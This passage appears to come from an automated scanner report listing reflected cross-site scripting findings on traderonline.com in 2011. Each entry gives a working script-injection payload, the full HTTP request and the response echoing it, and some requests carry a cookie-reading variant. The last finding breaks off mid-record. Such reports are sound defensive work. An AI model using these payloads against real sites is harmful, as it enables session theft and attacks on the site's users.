<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?e5579";alert(1)//18aae412f91=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1456. http://www.traderonline.com/copyright/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/copyright/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44c48<script>alert(1)</script>923c2e1ea45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /copyright44c48<script>alert(1)</script>923c2e1ea45/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/copyright44c48<script>alert(1)</script>923c2e1ea45/</span>
...[SNIP]...

4.1457. http://www.traderonline.com/css/promoCSS.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/css/promoCSS.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c89f8<script>alert(1)</script>f02bcd6ebe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssc89f8<script>alert(1)</script>f02bcd6ebe0/promoCSS.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:27:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/cssc89f8<script>alert(1)</script>f02bcd6ebe0/promoCSS.php</span>
...[SNIP]...

4.1458. http://www.traderonline.com/css/tolhomecss.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/css/tolhomecss.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b116<script>alert(1)</script>87d127fc818 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9b116<script>alert(1)</script>87d127fc818/tolhomecss.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; s_pers=%20s_nr%3D1295884785350%7C1298476785350%3B%20s_lv%3D1295884785352%7C1390492785352%3B%20s_lv_s%3DFirst%2520Visit%7C1295886585352%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.2.10.1295884751

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:27:22 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27597

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/css9b116<script>alert(1)</script>87d127fc818/tolhomecss.php</span>
...[SNIP]...

4.1459. http://www.traderonline.com/find/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/find/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c090<script>alert(1)</script>a2d1c9763c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /find7c090<script>alert(1)</script>a2d1c9763c0/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:17 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/find7c090<script>alert(1)</script>a2d1c9763c0/</span>
...[SNIP]...

4.1460. http://www.traderonline.com/javascript/master_s_code.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/javascript/master_s_code.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36fb8<script>alert(1)</script>9b8e187e065 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript36fb8<script>alert(1)</script>9b8e187e065/master_s_code.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:27:03 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27606

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascript36fb8<script>alert(1)</script>9b8e187e065/master_s_code.js</span>
...[SNIP]...

4.1461. http://www.traderonline.com/javascript/realmedia.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/javascript/realmedia.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36485<script>alert(1)</script>f3a99f08b5b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript36485<script>alert(1)</script>f3a99f08b5b/realmedia.js HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:38 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27602

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascript36485<script>alert(1)</script>f3a99f08b5b/realmedia.js</span>
...[SNIP]...

4.1462. http://www.traderonline.com/myt/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/myt/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f084<script>alert(1)</script>775c491c35d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myt5f084<script>alert(1)</script>775c491c35d/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27583

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/myt5f084<script>alert(1)</script>775c491c35d/</span>
...[SNIP]...

4.1463. http://www.traderonline.com/myt/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/myt/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e958"%3balert(1)//68c3f4dfbcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3e958";alert(1)//68c3f4dfbcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /myt/?3e958"%3balert(1)//68c3f4dfbcd=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:07 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 35274

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>MyTrader - Save, Modify, Delete Vehicles for Sale - TraderOnline.com</title>
<meta name="description" content="U
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?3e958";alert(1)//68c3f4dfbcd=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1464. http://www.traderonline.com/privacy-policy/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/privacy-policy/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95fcd<script>alert(1)</script>8ca7cdf2e27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy-policy95fcd<script>alert(1)</script>8ca7cdf2e27/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/privacy-policy95fcd<script>alert(1)</script>8ca7cdf2e27/</span>
...[SNIP]...

4.1465. http://www.traderonline.com/research/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/research/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b765<script>alert(1)</script>14da2687f8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /research5b765<script>alert(1)</script>14da2687f8b/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:26 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/research5b765<script>alert(1)</script>14da2687f8b/</span>
...[SNIP]...

4.1466. http://www.traderonline.com/security/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/security/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec6df<script>alert(1)</script>04ceb87c2eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /securityec6df<script>alert(1)</script>04ceb87c2eb/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:33 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/securityec6df<script>alert(1)</script>04ceb87c2eb/</span>
...[SNIP]...

4.1467. http://www.traderonline.com/security/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/security/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af3e2"%3balert(1)//10f0b96a9fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as af3e2";alert(1)//10f0b96a9fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /security/?af3e2"%3balert(1)//10f0b96a9fe=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:00 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 40601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>TraderOnline.com Safety & Fraud Center - Protect Yourself from Online Fraud</title>
<meta name="description"
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?af3e2";alert(1)//10f0b96a9fe=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1468. http://www.traderonline.com/sell/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/sell/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fecde<script>alert(1)</script>d30d288ed03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sellfecde<script>alert(1)</script>d30d288ed03/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:21 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/sellfecde<script>alert(1)</script>d30d288ed03/</span>
...[SNIP]...

4.1469. http://www.traderonline.com/sitemap/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff701<script>alert(1)</script>48128bf00f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemapff701<script>alert(1)</script>48128bf00f4/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:01 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/sitemapff701<script>alert(1)</script>48128bf00f4/</span>
...[SNIP]...

4.1470. http://www.traderonline.com/terms-of-use/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/terms-of-use/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42768<script>alert(1)</script>a6b1bbad8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /terms-of-use42768<script>alert(1)</script>a6b1bbad8b5/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:47 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. – TraderOnline.com
...[SNIP]...
<span style="color:red;">/terms-of-use42768<script>alert(1)</script>a6b1bbad8b5/</span>
...[SNIP]...

4.1471. http://www.traderonline.com/x22 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.traderonline.com
Path:	/x22

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec89d<script>alert(1)</script>93a08fbf703 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /x22ec89d<script>alert(1)</script>93a08fbf703 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
